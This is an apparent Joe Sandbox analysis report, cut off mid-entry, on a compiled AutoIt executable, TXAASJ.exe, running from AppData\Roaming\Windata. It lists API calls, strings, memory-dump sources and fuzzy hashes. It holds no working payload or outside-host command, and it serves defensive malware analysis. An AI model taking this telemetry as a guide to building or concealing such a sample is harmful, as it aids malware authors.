                                                                                                                          • Part of subcall function 00E7F84C: GetLastError.KERNEL32(?,00E86DF1,00EFEEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00E7F8A6
                                                                                                                          • Part of subcall function 00E7F84C: __free_osfhnd.LIBCMT ref: 00E7F8B3
                                                                                                                          • Part of subcall function 00E7F84C: __dosmaperr.LIBCMT ref: 00E7F8D5
                                                                                                                          • Part of subcall function 00E7889E: __getptd_noexit.LIBCMT ref: 00E7889E
                                                                                                                        • __lseeki64_nolock.LIBCMT ref: 00E86FBD
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00E870F2
                                                                                                                        • ___createFile.LIBCMT ref: 00E87111
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00E8711E
                                                                                                                        • __dosmaperr.LIBCMT ref: 00E87125
                                                                                                                        • __free_osfhnd.LIBCMT ref: 00E87145
                                                                                                                        • __invoke_watson.LIBCMT ref: 00E87173
                                                                                                                        • __wsopen_helper.LIBCMT ref: 00E8718D
                                                                                                                        Similarity
                                                                                                                        • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                                                                                        • String ID: 9A$@

                                                                                                                        Control-flow Graph

                                                                                                                        • [Graph not preserved in extraction; first block e51f04-e51f9c. APIs appearing in the graph: GetForegroundWindow, CharUpperBuffW, GetDesktopWindow, EnumChildWindows, EnumWindows, IsWindow]
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E57E53: _memmove.LIBCMT ref: 00E57EB9
                                                                                                                        • GetForegroundWindow.USER32 ref: 00E51FBE
                                                                                                                        • IsWindow.USER32(?), ref: 00EC282E
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Foreground_memmove
                                                                                                                        • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe,00000104,?,00000000,00000001,00000000), ref: 00E5428C
                                                                                                                          • Part of subcall function 00E5CAEE: _memmove.LIBCMT ref: 00E5CB2F
                                                                                                                          • Part of subcall function 00E71BC7: __wcsicmp_l.LIBCMT ref: 00E71C50
                                                                                                                        • _wcscpy.LIBCMT ref: 00E543C0
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe,00000104,?,?,?,?,00000000,CMDLINE,?,?,00000100,00000000,CMDLINE,?,?), ref: 00EC214E
                                                                                                                        Similarity
                                                                                                                        • API ID: FileModuleName$__wcsicmp_l_memmove_wcscpy
                                                                                                                        • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe$CMDLINE$CMDLINERAW

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00E52F8B
                                                                                                                        • RegisterClassExW.USER32(00000030), ref: 00E52FB5
                                                                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E52FC6
                                                                                                                        • InitCommonControlsEx.COMCTL32(?), ref: 00E52FE3
                                                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E52FF3
                                                                                                                        • LoadIconW.USER32(000000A9), ref: 00E53009
                                                                                                                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E53018
                                                                                                                        Similarity
                                                                                                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00E6EA39
                                                                                                                        • __wsplitpath.LIBCMT ref: 00E6EA56
                                                                                                                          • Part of subcall function 00E7297D: __wsplitpath_helper.LIBCMT ref: 00E729BD
                                                                                                                        • _wcsncat.LIBCMT ref: 00E6EA69
                                                                                                                        • __makepath.LIBCMT ref: 00E6EA85
                                                                                                                          • Part of subcall function 00E72BFF: __wmakepath_s.LIBCMT ref: 00E72C13
                                                                                                                          • Part of subcall function 00E7010A: std::exception::exception.LIBCMT ref: 00E7013E
                                                                                                                          • Part of subcall function 00E7010A: __CxxThrowException@8.LIBCMT ref: 00E70153
                                                                                                                        • _wcscpy.LIBCMT ref: 00E6EABE
                                                                                                                          • Part of subcall function 00E6EB05: RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,00E6EADA,?,?), ref: 00E6EB27
                                                                                                                        • _wcscat.LIBCMT ref: 00EC32FC
                                                                                                                        • _wcscat.LIBCMT ref: 00EC3334
                                                                                                                        • _wcsncpy.LIBCMT ref: 00EC3370
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcscat$Exception@8FileModuleNameOpenThrow__makepath__wmakepath_s__wsplitpath__wsplitpath_helper_wcscpy_wcsncat_wcsncpystd::exception::exception
                                                                                                                        • String ID: Include$\

                                                                                                                        Control-flow Graph

                                                                                                                        • [Graph not preserved in extraction; first block e529c2-e529e2. APIs appearing in the graph: DefWindowProcW, PostQuitMessage, SetTimer, RegisterWindowMessageW, CreatePopupMenu, KillTimer, MoveWindow, SetFocus]
                                                                                                                        APIs
                                                                                                                        • DefWindowProcW.USER32(?,?,?,?), ref: 00E52A33
                                                                                                                        • KillTimer.USER32(?,00000001), ref: 00E52A5D
                                                                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00E52A80
                                                                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E52A8B
                                                                                                                        • CreatePopupMenu.USER32 ref: 00E52A9F
                                                                                                                        • PostQuitMessage.USER32(00000000), ref: 00E52AAE
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                        • String ID: TaskbarCreated

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00E530B0
                                                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00E530BF
                                                                                                                        • LoadIconW.USER32(00000063), ref: 00E530D5
                                                                                                                        • LoadIconW.USER32(000000A4), ref: 00E530E7
                                                                                                                        • LoadIconW.USER32(000000A2), ref: 00E530F9
                                                                                                                          • Part of subcall function 00E5318A: LoadImageW.USER32(00E50000,00000063,00000001,00000010,00000010,00000000), ref: 00E531AE
                                                                                                                        • RegisterClassExW.USER32(?), ref: 00E53167
                                                                                                                          • Part of subcall function 00E52F58: GetSysColorBrush.USER32(0000000F), ref: 00E52F8B
                                                                                                                          • Part of subcall function 00E52F58: RegisterClassExW.USER32(00000030), ref: 00E52FB5
                                                                                                                          • Part of subcall function 00E52F58: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E52FC6
                                                                                                                          • Part of subcall function 00E52F58: InitCommonControlsEx.COMCTL32(?), ref: 00E52FE3
                                                                                                                          • Part of subcall function 00E52F58: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E52FF3
                                                                                                                          • Part of subcall function 00E52F58: LoadIconW.USER32(000000A9), ref: 00E53009
                                                                                                                          • Part of subcall function 00E52F58: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E53018
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                        • String ID: #$0$AutoIt v3
                                                                                                                        • API String ID: 423443420-4155596026
                                                                                                                        • Opcode ID: 378f286eafba211caecb31e9b5279cf1ab6b80fc33258670280322bf5d107aea
                                                                                                                        • Instruction ID: 9071dc7a38bac7d2ea8e597a7fe5024faf1d5ce9ecb50b33e7c226e5de8dfac3
                                                                                                                        • Opcode Fuzzy Hash: 378f286eafba211caecb31e9b5279cf1ab6b80fc33258670280322bf5d107aea
                                                                                                                        • Instruction Fuzzy Hash: 0F214AB4E04308AFDB109FA9EC0AAD9BBF9FB48310F01852AE714B22A0D77546449F95

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • __lock.LIBCMT ref: 00E7BA74
                                                                                                                          • Part of subcall function 00E78984: __mtinitlocknum.LIBCMT ref: 00E78996
                                                                                                                          • Part of subcall function 00E78984: EnterCriticalSection.KERNEL32(00E70127,?,00E7876D,0000000D), ref: 00E789AF
                                                                                                                        • __calloc_crt.LIBCMT ref: 00E7BA85
                                                                                                                          • Part of subcall function 00E77616: __calloc_impl.LIBCMT ref: 00E77625
                                                                                                                          • Part of subcall function 00E77616: Sleep.KERNEL32(00000000,?,00E70127,?,00E5125D,00000058,?,?), ref: 00E7763C
                                                                                                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 00E7BAA0
                                                                                                                        • GetStartupInfoW.KERNEL32(?,00F06990,00000064,00E76B14,00F067D8,00000014), ref: 00E7BAF9
                                                                                                                        • __calloc_crt.LIBCMT ref: 00E7BB44
                                                                                                                        • GetFileType.KERNEL32(00000001), ref: 00E7BB8B
                                                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 00E7BBC4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1426640281-0
                                                                                                                        • Opcode ID: 7c1995df7dbdfb4fc4b4ff35e844039b59ed7aa92356fb229f1fc0c25a39001f
                                                                                                                        • Instruction ID: 2f0494ebef60c4813ef0c2fc71af543ebe732ebf551ce488798740d0f11e5d7f
                                                                                                                        • Opcode Fuzzy Hash: 7c1995df7dbdfb4fc4b4ff35e844039b59ed7aa92356fb229f1fc0c25a39001f
                                                                                                                        • Instruction Fuzzy Hash: 9081D2709057458FCB14CF68C8807A9BBF0EF49328B24D25EE4AABB3D1CB349802DB55

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00E545F0
                                                                                                                        • CoUninitialize.COMBASE ref: 00E54695
                                                                                                                        • UnregisterHotKey.USER32(?), ref: 00E547BD
                                                                                                                        • DestroyWindow.USER32(?), ref: 00EC5936
                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00EC599D
                                                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00EC59CA
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                        • String ID: close all
                                                                                                                        • API String ID: 469580280-3243417748
                                                                                                                        • Opcode ID: cb192914b1c206933d456cb715004908318280e901464614754d9ad37676de5a
                                                                                                                        • Instruction ID: 626498a3381ea23c2fcf3d8430e5210efcfacba05a2e2311c43c21d4c64e7fda
                                                                                                                        • Opcode Fuzzy Hash: cb192914b1c206933d456cb715004908318280e901464614754d9ad37676de5a
                                                                                                                        • Instruction Fuzzy Hash: 73911775601602CFC715EF24D995B68F3E4FF05306F5066A9E90AB72A2DB30AD5ACF00

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,00E6EADA,?,?), ref: 00E6EB27
                                                                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?,?,00E6EADA,?,?), ref: 00EC4B26
                                                                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000,?,?,00E6EADA,?,?), ref: 00EC4B65
                                                                                                                        • RegCloseKey.ADVAPI32(?,?,00E6EADA,?,?), ref: 00EC4B94
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: QueryValue$CloseOpen
                                                                                                                        • String ID: Include$Software\AutoIt v3\AutoIt
                                                                                                                        • API String ID: 1586453840-614718249
                                                                                                                        • Opcode ID: 43f3606196d0335d63e0241a4fbdf6d54cbfde821c67b8d2ea88b91e55891f28
                                                                                                                        • Instruction ID: ba31dcac1fa352158706a4f6771aa535cbc4ae114de03c2aba5dab915cb975e9
                                                                                                                        • Opcode Fuzzy Hash: 43f3606196d0335d63e0241a4fbdf6d54cbfde821c67b8d2ea88b91e55891f28
                                                                                                                        • Instruction Fuzzy Hash: 39117F71605208BEEB049BA4DD96EFE7BBCEF04348F101459B506F2090EA719E05D760

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00E52ECB
                                                                                                                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00E52EEC
                                                                                                                        • ShowWindow.USER32(00000000), ref: 00E52F00
                                                                                                                        • ShowWindow.USER32(00000000), ref: 00E52F09
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$CreateShow
                                                                                                                        • String ID: AutoIt v3$edit
                                                                                                                        • API String ID: 1584632944-3779509399
                                                                                                                        • Opcode ID: c4c9b87f63a83fd3d14197945bb2b9b78c3c940ee6b61d3629f0ad32a18b0dd5
                                                                                                                        • Instruction ID: 1da0d2f6a84ecfe6c07b8895d6d1c73b5cad1167fca4fc10dbd9bbe7c2381998
                                                                                                                        • Opcode Fuzzy Hash: c4c9b87f63a83fd3d14197945bb2b9b78c3c940ee6b61d3629f0ad32a18b0dd5
                                                                                                                        • Instruction Fuzzy Hash: AFF030709452D87ED73057636C08EB73E7DE7CAF10B02801FBA08A2160C1610985EAB0

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E53F9B: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00E534E2,?,00000001), ref: 00E53FCD
                                                                                                                        • _free.LIBCMT ref: 00EC3C27
                                                                                                                        • _free.LIBCMT ref: 00EC3C6E
                                                                                                                          • Part of subcall function 00E5BDF0: GetCurrentDirectoryW.KERNEL32(00000104,?,?,00002000,?,00F122E8,?,00000000,?,00E53E2E,?,00000000,?,00EEDBF0,00000000,?), ref: 00E5BE8B
                                                                                                                          • Part of subcall function 00E5BDF0: GetFullPathNameW.KERNEL32(?,00000104,?,?,?,00E53E2E,?,00000000,?,00EEDBF0,00000000,?,00000002), ref: 00E5BEA7
                                                                                                                          • Part of subcall function 00E5BDF0: __wsplitpath.LIBCMT ref: 00E5BF19
                                                                                                                          • Part of subcall function 00E5BDF0: _wcscpy.LIBCMT ref: 00E5BF31
                                                                                                                          • Part of subcall function 00E5BDF0: _wcscat.LIBCMT ref: 00E5BF46
                                                                                                                          • Part of subcall function 00E5BDF0: SetCurrentDirectoryW.KERNEL32(?), ref: 00E5BF56
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CurrentDirectory_free$FullLibraryLoadNamePath__wsplitpath_wcscat_wcscpy
                                                                                                                        • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error$E<
                                                                                                                        • API String ID: 1510338132-1955187200
                                                                                                                        • Opcode ID: 49481d7705f1d8cdecd39ebdb2b3c60f7c08240016f53156b261e9c819c2d7db
                                                                                                                        • Instruction ID: 436702e651097d50becd9f06d1559634c656eb0faaf92379b5984bd5c6a47fca
                                                                                                                        • Opcode Fuzzy Hash: 49481d7705f1d8cdecd39ebdb2b3c60f7c08240016f53156b261e9c819c2d7db
                                                                                                                        • Instruction Fuzzy Hash: 92915E71A10259AFCF04EFA4CD51AEEB7B4BF08314F14942AF816BB291DB31AE05CB50

                                                                                                                        Control-flow Graph

                                                                                                                        [Control-flow graph image not reproduced; node legend: Executed / Not Executed]
                                                                                                                        APIs
                                                                                                                        • SHGetMalloc.SHELL32(1<), ref: 00E53A7D
                                                                                                                        • SHGetPathFromIDListW.SHELL32(?,?), ref: 00E53AD2
                                                                                                                        • SHGetDesktopFolder.SHELL32(?), ref: 00E53A8F
                                                                                                                          • Part of subcall function 00E53B1E: _wcsncpy.LIBCMT ref: 00E53B32
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DesktopFolderFromListMallocPath_wcsncpy
                                                                                                                        • String ID: 1<
                                                                                                                        • API String ID: 3981382179-2494417897
                                                                                                                        • Opcode ID: c9634802378f39ec085489ca0cbb4107243451a9b6e7963f12926e0d01429c29
                                                                                                                        • Instruction ID: d13d5c8332c606450d90ef45a51dd3640b7abb6b350ab27e7803dfaa0fafc9e5
                                                                                                                        • Opcode Fuzzy Hash: c9634802378f39ec085489ca0cbb4107243451a9b6e7963f12926e0d01429c29
                                                                                                                        • Instruction Fuzzy Hash: 2F21AF76B00114ABCB10DFA5DC84EEEB7BDEF88345B004499F909E7241DB319E4ACB90
                                                                                                                        APIs
                                                                                                                        • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00E6C948,SwapMouseButtons,00000004,?), ref: 00E6C979
                                                                                                                        • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,00E6C948,SwapMouseButtons,00000004,?,?,?,?,00E6BF22), ref: 00E6C99A
                                                                                                                        • RegCloseKey.KERNEL32(00000000,?,?,00E6C948,SwapMouseButtons,00000004,?,?,?,?,00E6BF22), ref: 00E6C9BC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseOpenQueryValue
                                                                                                                        • String ID: Control Panel\Mouse
                                                                                                                        • API String ID: 3677997916-824357125
                                                                                                                        • Opcode ID: 8d78747e8042c48c9dc259506ab8134604cb5710004f37d0778d828f1acefd0c
                                                                                                                        • Instruction ID: ffc041053c28920207d7cc66cd3985ab9d7917509fbe2747cdbd195a1a09f833
                                                                                                                        • Opcode Fuzzy Hash: 8d78747e8042c48c9dc259506ab8134604cb5710004f37d0778d828f1acefd0c
                                                                                                                        • Instruction Fuzzy Hash: BA117C75551608BFDB118F64EC44EFF7BBCEF84788F20541AA981F7210D231AE449B60
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E541A7: _fseek.LIBCMT ref: 00E541BF
                                                                                                                          • Part of subcall function 00E9CE59: _wcscmp.LIBCMT ref: 00E9CF49
                                                                                                                          • Part of subcall function 00E9CE59: _wcscmp.LIBCMT ref: 00E9CF5C
                                                                                                                        • _free.LIBCMT ref: 00E9CDC9
                                                                                                                        • _free.LIBCMT ref: 00E9CDD0
                                                                                                                        • _free.LIBCMT ref: 00E9CE3B
                                                                                                                          • Part of subcall function 00E728CA: RtlFreeHeap.NTDLL(00000000,00000000,?,00E78715,00000000,00E788A3,00E74673,?), ref: 00E728DE
                                                                                                                          • Part of subcall function 00E728CA: GetLastError.KERNEL32(00000000,?,00E78715,00000000,00E788A3,00E74673,?), ref: 00E728F0
                                                                                                                        • _free.LIBCMT ref: 00E9CE43
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1552873950-0
                                                                                                                        • Opcode ID: 3bbf84d6b84c5ccb4406d7a14d13c4f849fbec825050499589f31b9b6ee91132
                                                                                                                        • Instruction ID: 83403fd42f31aae7aa8677c869cb9b9e4e8527f157ce74c31ffaaaf96e799ac2
                                                                                                                        • Opcode Fuzzy Hash: 3bbf84d6b84c5ccb4406d7a14d13c4f849fbec825050499589f31b9b6ee91132
                                                                                                                        • Instruction Fuzzy Hash: F4515BB1904218AFDF149F64CC81AAEBBB9EF08344F1054AEF61DB7291D7715A808F69
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00EC3CF1
                                                                                                                        • GetOpenFileNameW.COMDLG32(?,?,00000001,00F122E8), ref: 00EC3D35
                                                                                                                          • Part of subcall function 00E531B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00E531DA
                                                                                                                          • Part of subcall function 00E53A67: SHGetMalloc.SHELL32(1<), ref: 00E53A7D
                                                                                                                          • Part of subcall function 00E53A67: SHGetDesktopFolder.SHELL32(?), ref: 00E53A8F
                                                                                                                          • Part of subcall function 00E53A67: SHGetPathFromIDListW.SHELL32(?,?), ref: 00E53AD2
                                                                                                                          • Part of subcall function 00E53B45: GetFullPathNameW.KERNEL32(?,00000104,?,?,00F122E8,?), ref: 00E53B65
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
